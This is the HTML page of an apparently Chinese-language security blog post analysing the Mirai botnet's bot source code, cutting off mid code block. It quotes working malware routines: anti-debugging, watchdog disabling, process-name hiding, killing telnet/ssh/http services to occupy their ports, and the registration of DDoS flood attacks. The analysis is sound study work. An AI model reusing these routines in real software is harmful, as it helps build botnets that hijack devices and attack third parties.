<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"oneshell.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":true,"nav":{"gitalk":{"order":-2}},"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="运行初始化设置gdb反调试： 1signal(SIGTRAP, &amp;anti_gdb_entry);   &#x2F;&#x2F; 如果发生SIGTRAP信号，则调用anti_gdb_entry SIGTRAP信号是由断点指令或者其他陷阱（trap）指令产生的，因此如果发生该信号说明可能存在调试器。bot在运行的过程中如果触发了该信号量，则调用函数anti_gdb_entry。 1234static void">
<meta property="og:type" content="article">
<meta property="og:title" content="mirai源码分析：bot分析">
<meta property="og:url" content="https://oneshell.top/2022/12/23/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9Abot%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="OneShell">
<meta property="og:description" content="运行初始化设置gdb反调试： 1signal(SIGTRAP, &amp;anti_gdb_entry);   &#x2F;&#x2F; 如果发生SIGTRAP信号，则调用anti_gdb_entry SIGTRAP信号是由断点指令或者其他陷阱（trap）指令产生的，因此如果发生该信号说明可能存在调试器。bot在运行的过程中如果触发了该信号量，则调用函数anti_gdb_entry。 1234static void">
<meta property="og:locale">
<meta property="article:published_time" content="2022-12-23T02:44:47.000Z">
<meta property="article:modified_time" content="2023-04-11T06:02:25.016Z">
<meta property="article:author" content="OneShell">
<meta property="article:tag" content="mirai">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://oneshell.top/2022/12/23/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9Abot%E5%88%86%E6%9E%90/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>mirai源码分析：bot分析 | OneShell</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">OneShell</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">I fight for a brighter tomorrow</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>Schedule</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="https://oneshell.top/2022/12/23/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9Abot%E5%88%86%E6%9E%90/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="OneShell">
      <meta itemprop="description" content="菜">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="OneShell">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          mirai源码分析：bot分析
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-12-23 10:44:47" itemprop="dateCreated datePublished" datetime="2022-12-23T10:44:47+08:00">2022-12-23</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2023-04-11 14:02:25" itemprop="dateModified" datetime="2023-04-11T14:02:25+08:00">2023-04-11</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Topics/" itemprop="url" rel="index"><span itemprop="name">Topics</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Topics/mirai/" itemprop="url" rel="index"><span itemprop="name">mirai</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="运行初始化"><a href="#运行初始化" class="headerlink" title="运行初始化"></a>运行初始化</h2><p>设置gdb反调试：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">signal(SIGTRAP, &amp;anti_gdb_entry);   <span class="comment">// 如果发生SIGTRAP信号，则调用anti_gdb_entry</span></span><br></pre></td></tr></table></figure>
<p>SIGTRAP信号是由断点指令或者其他陷阱（trap）指令产生的，因此如果发生该信号说明可能存在调试器。bot在运行的过程中如果触发了该信号量，则调用函数<code>anti_gdb_entry</code>。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">anti_gdb_entry</span><span class="params">(<span class="type">int</span> sig)</span></span><br><span class="line">&#123;</span><br><span class="line">    resolve_func = resolve_cnc_addr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>resolve_func</code>是一个函数指针，此处重写为函数<code>resolve_cnc_addr</code>。个人感觉在<code>anti_gdb_entry</code>函数中还可以做更多和反调试相关的事。</p>
<p>关闭看门狗，防止设备重启：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Prevent watchdog from rebooting device</span></span><br><span class="line"><span class="keyword">if</span> ((wfd = open(<span class="string">&quot;/dev/watchdog&quot;</span>, <span class="number">2</span>)) != <span class="number">-1</span> ||</span><br><span class="line">    (wfd = open(<span class="string">&quot;/dev/misc/watchdog&quot;</span>, <span class="number">2</span>)) != <span class="number">-1</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int</span> one = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    ioctl(wfd, <span class="number">0x80045704</span>, &amp;one);</span><br><span class="line">    close(wfd);</span><br><span class="line">    wfd = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>获取本地地址：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">LOCAL_ADDR = util_local_addr();</span><br></pre></td></tr></table></figure>
<p>函数<code>util_local_addr</code>通过使用<code>getsockname</code>函数，在未调用<code>bind</code>函数就调用<code>connect</code>函数的情形，获取到socket的本地地址。连接的IP也不一定是8.8.8.8，任意一公网IP即可。函数的返回值是一个整数，可以通过该整数转换成IP地址。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">ipv4_t</span> <span class="title function_">util_local_addr</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int</span> fd;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_in</span> <span class="title">addr</span>;</span></span><br><span class="line">    <span class="type">socklen_t</span> addr_len = <span class="keyword">sizeof</span> (addr);</span><br><span class="line"></span><br><span class="line">    errno = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> ((fd = socket(AF_INET, SOCK_DGRAM, <span class="number">0</span>)) == <span class="number">-1</span>)</span><br><span class="line">    &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[util] Failed to call socket(), errno = %d\n&quot;</span>, errno);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    addr.sin_family = AF_INET;</span><br><span class="line">    addr.sin_addr.s_addr = INET_ADDR(<span class="number">8</span>,<span class="number">8</span>,<span class="number">8</span>,<span class="number">8</span>);</span><br><span class="line">    addr.sin_port = htons(<span class="number">53</span>);</span><br><span class="line"></span><br><span class="line">    connect(fd, (<span class="keyword">struct</span> sockaddr *)&amp;addr, <span class="keyword">sizeof</span> (<span class="keyword">struct</span> sockaddr_in));</span><br><span class="line"></span><br><span class="line">    getsockname(fd, (<span class="keyword">struct</span> sockaddr *)&amp;addr, &amp;addr_len);</span><br><span class="line">    close(fd);</span><br><span class="line">    <span class="keyword">return</span> addr.sin_addr.s_addr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>保证唯一的bot在宿主机上运行：<br>bot调用函数<code>ensure_single_instance</code>来保证在宿主机上只有一个bot程序在运行，具体的实现原理是通过绑定本地端口48101，根据绑定是否成功判断是否有其他程序在使用该端口，如果有则杀死该进程并重新绑定到端口。不知道48101端口是否还有其他的作用。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">ensure_single_instance</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">static</span> BOOL local_bind = TRUE;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_in</span> <span class="title">addr</span>;</span></span><br><span class="line">    <span class="type">int</span> opt = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((fd_ctrl = socket(AF_INET, SOCK_STREAM, <span class="number">0</span>)) == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    setsockopt(fd_ctrl, SOL_SOCKET, SO_REUSEADDR, &amp;opt, <span class="keyword">sizeof</span> (<span class="type">int</span>));</span><br><span class="line">    fcntl(fd_ctrl, F_SETFL, O_NONBLOCK | fcntl(fd_ctrl, F_GETFL, <span class="number">0</span>));</span><br><span class="line"></span><br><span class="line">    addr.sin_family = AF_INET;</span><br><span class="line">    addr.sin_addr.s_addr = local_bind ? (INET_ADDR(<span class="number">127</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>)) : LOCAL_ADDR;</span><br><span class="line">    addr.sin_port = htons(SINGLE_INSTANCE_PORT);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Try to bind to the control port</span></span><br><span class="line">    errno = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (bind(fd_ctrl, (<span class="keyword">struct</span> sockaddr *)&amp;addr, <span class="keyword">sizeof</span> (<span class="keyword">struct</span> sockaddr_in)) == <span class="number">-1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">	    <span class="comment">// 如果bind失败且失败原因为EADDRNOTAVAIL，说明本地的48101端口不可用，可能存在其他程序（bot）在使用</span></span><br><span class="line">        <span class="keyword">if</span> (errno == EADDRNOTAVAIL &amp;&amp; local_bind)</span><br><span class="line">            local_bind = FALSE;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[main] Another instance is already running (errno = %d)! Sending kill request...\r\n&quot;</span>, errno);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">        <span class="comment">// Reset addr just in case</span></span><br><span class="line">        addr.sin_family = AF_INET;</span><br><span class="line">        addr.sin_addr.s_addr = INADDR_ANY;</span><br><span class="line">        addr.sin_port = htons(SINGLE_INSTANCE_PORT);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (connect(fd_ctrl, (<span class="keyword">struct</span> sockaddr *)&amp;addr, <span class="keyword">sizeof</span> (<span class="keyword">struct</span> sockaddr_in)) == <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;[main] Failed to connect to fd_ctrl to request process termination\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">        sleep(<span class="number">5</span>);</span><br><span class="line">        close(fd_ctrl);</span><br><span class="line">        <span class="comment">// 杀死占用端口48101的端口</span></span><br><span class="line">        killer_kill_by_port(htons(SINGLE_INSTANCE_PORT));</span><br><span class="line">        ensure_single_instance(); <span class="comment">// Call again, so that we are now the control</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (listen(fd_ctrl, <span class="number">1</span>) == <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;[main] Failed to call listen() on fd_ctrl\n&quot;</span>);</span><br><span class="line">            close(fd_ctrl);</span><br><span class="line">            sleep(<span class="number">5</span>);</span><br><span class="line">            killer_kill_by_port(htons(SINGLE_INSTANCE_PORT));</span><br><span class="line">            ensure_single_instance();</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">        &#125;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[main] We are the only process on this system!\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>进程隐藏：bot的进程隐藏是结合修改<code>argv[0]</code>和使用<code>prctl</code>两种方式。<br>隐藏<code>args[0]</code>：<br>bot使用自定义的随机函数获取到一个随机字符串，然后写入到<code>args[0]</code>中，这种方式是通过修改<code>/proc/pid/cmdline</code>，使得<code>ps -ef</code>、<code>ps -aux</code>查看不到正确的进程名和参数。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Hide argv0</span></span><br><span class="line">name_buf_len = ((rand_next() % <span class="number">4</span>) + <span class="number">3</span>) * <span class="number">4</span>;</span><br><span class="line">rand_alphastr(name_buf, name_buf_len);</span><br><span class="line">name_buf[name_buf_len] = <span class="number">0</span>;</span><br><span class="line">util_strcpy(args[<span class="number">0</span>], name_buf);</span><br></pre></td></tr></table></figure>
<p>在调试过程中使用<code>ps</code>查看bot进程，这是没有修改<code>argv[0]</code>时bot进程名：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">utest     161447  161324  0 00:20 pts/1    00:00:00 /home/utest/app/Mirai-Source-Code/mirai/debug/mirai.dbg</span><br></pre></td></tr></table></figure>
<p>当执行完毕后，由于原本的进程名太长，修改完毕后还是能查看到一部门进程名。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">utest     161447  161324  0 00:20 pts/1    00:00:00 ht2jhfsj512jodol8nin -Source-Code/mirai/debug/mirai.dbg</span><br></pre></td></tr></table></figure>
<p>使用<code>prctl</code>：<br><code>prctl</code>修改了<code>/proc/pid/stat</code>和<code>/proc/pid/status</code> 中的进程名称，使得<code>ps -A</code>、<code>top</code>命令无法看到原来的进程名，但是没有修改<code>/proc/pid/cmdline</code>。二者配合可以达到进程隐藏目的。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Hide process name</span></span><br><span class="line">name_buf_len = ((rand_next() % <span class="number">6</span>) + <span class="number">3</span>) * <span class="number">4</span>;</span><br><span class="line">rand_alphastr(name_buf, name_buf_len);</span><br><span class="line">name_buf[name_buf_len] = <span class="number">0</span>;</span><br><span class="line">prctl(PR_SET_NAME, name_buf);</span><br></pre></td></tr></table></figure>
<p>执行前：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai/debug on git:comments x [0:39:23]</span><br><span class="line">$ cat /proc/165896/stat</span><br><span class="line">165896 (mirai.dbg) t 161324 165896 121045 34817 161324 1073741824 192 0 0 0 0 0 0 0 20 0 1 0 10699613 1212416 64 18446744073709551615 4198400 4898477 140737488346688 0 0 0 0 0 1088 1 0 0 17 2 0 0 0 0 0 5075104 50</span><br><span class="line">96208 5107712 140737488347330 140737488347386 140737488347386 140737488351168 0</span><br><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai/debug on git:comments x [0:39:30]</span><br><span class="line">$ cat /proc/165896/status</span><br><span class="line">Name:   mirai.dbg</span><br></pre></td></tr></table></figure>
<p>执行后：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai/debug on git:comments x [0:39:41]</span><br><span class="line">$ cat /proc/165896/stat</span><br><span class="line">165896 (s8glsucvw7j7gu4) t 161324 165896 121045 34817 161324 1073741824 192 0 0 0 0 0 0 0 20 0 1 0 10699613 1212416 64 18446744073709551615 4198400 4898477 140737488346688 0 0 0 0 0 1088 1 0 0 17 2 0 0 0 0 0 5075</span><br><span class="line">104 5096208 5107712 140737488347330 140737488347386 140737488347386 140737488351168 0</span><br><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai/debug on git:comments x [0:39:57]</span><br><span class="line">$ cat /proc/165896/status</span><br><span class="line">Name:   s8glsucvw7j7gu4</span><br></pre></td></tr></table></figure>
<h2 id="attack模块"><a href="#attack模块" class="headerlink" title="attack模块"></a>attack模块</h2><p>bot执行<code>attack_init</code>初始化DDOS相关模块，如下，这其实和登陆到cnc中可以看到的攻击功能是相同的。bot连接到cnc，等待攻击者登陆cnc下发命令，然后bot执行。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">BOOL <span class="title function_">attack_init</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line"></span><br><span class="line">    add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_udp_generic);</span><br><span class="line">    add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_udp_vse);</span><br><span class="line">    add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_udp_dns);</span><br><span class="line">	add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_udp_plain);</span><br><span class="line"></span><br><span class="line">    add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_tcp_syn);</span><br><span class="line">    add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_tcp_ack);</span><br><span class="line">    add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_tcp_stomp);</span><br><span class="line"></span><br><span class="line">    add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_gre_ip);</span><br><span class="line">    add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_gre_eth);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//add_attack(ATK_VEC_PROXY, (ATTACK_FUNC)attack_app_proxy);</span></span><br><span class="line">    add_attack(ATK_VEC_HTTP, (ATTACK_FUNC)attack_app_http);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> TRUE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>cnc中的攻击方式如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">mirai-user@botnet# ?</span><br><span class="line">Available attack list</span><br><span class="line">udp: UDP flood</span><br><span class="line">ack: ACK flood</span><br><span class="line">stomp: TCP stomp flood</span><br><span class="line">greip: GRE IP flood</span><br><span class="line">http: HTTP flood</span><br><span class="line">vse: Valve source engine specific flood</span><br><span class="line">dns: DNS resolver flood using the targets domain, input IP is ignored</span><br><span class="line">syn: SYN flood</span><br><span class="line">greeth: GRE Ethernet flood</span><br><span class="line">udpplain: UDP flood with less options. optimized for higher PPS</span><br></pre></td></tr></table></figure>
<p>初始化攻击手段则是通过定义一个结构体，将攻击方式和攻击函数写入，然后再保存到全局的攻击方式<code>methods</code>中，这样使得bot的攻击扩展性增加。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">add_attack</span><span class="params">(ATTACK_VECTOR <span class="built_in">vector</span>, ATTACK_FUNC func)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">attack_method</span> *<span class="title">method</span> =</span> <span class="built_in">calloc</span>(<span class="number">1</span>, <span class="keyword">sizeof</span> (<span class="keyword">struct</span> attack_method));</span><br><span class="line"></span><br><span class="line">    method-&gt;<span class="built_in">vector</span> = <span class="built_in">vector</span>;</span><br><span class="line">    method-&gt;func = func;</span><br><span class="line"></span><br><span class="line">    methods = <span class="built_in">realloc</span>(methods, (methods_len + <span class="number">1</span>) * <span class="keyword">sizeof</span> (<span class="keyword">struct</span> attack_method *));</span><br><span class="line">    methods[methods_len++] = method;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="killer模块"><a href="#killer模块" class="headerlink" title="killer模块"></a>killer模块</h2><p><code>killer_init</code>函数主要有两个功能：</p>
<ol>
<li>杀死22、23、80端口的进程，并占用这些端口。物联网设备常用的管理方式就是通过ssh、telnet或者网络http进行管理，bot通过杀死相应进程并占用使得清除bot增加难度。</li>
<li>检查自身是否有<code>/proc/</code>目录的权限，扫描其中的进程文件夹并杀死满足特定文件名的进程，或者内存中包含某些关键数据的进程。</li>
</ol>
<p>以杀死23端口进程并占用代码举例：bot先通过<code>killer_kill_by_port</code>杀死23端口进程，然后重新<code>bind</code>绑定并<code>listen</code>监听23端口。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">    tmp_bind_addr.sin_family = AF_INET;</span><br><span class="line">    tmp_bind_addr.sin_addr.s_addr = INADDR_ANY;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Kill telnet service and prevent it from 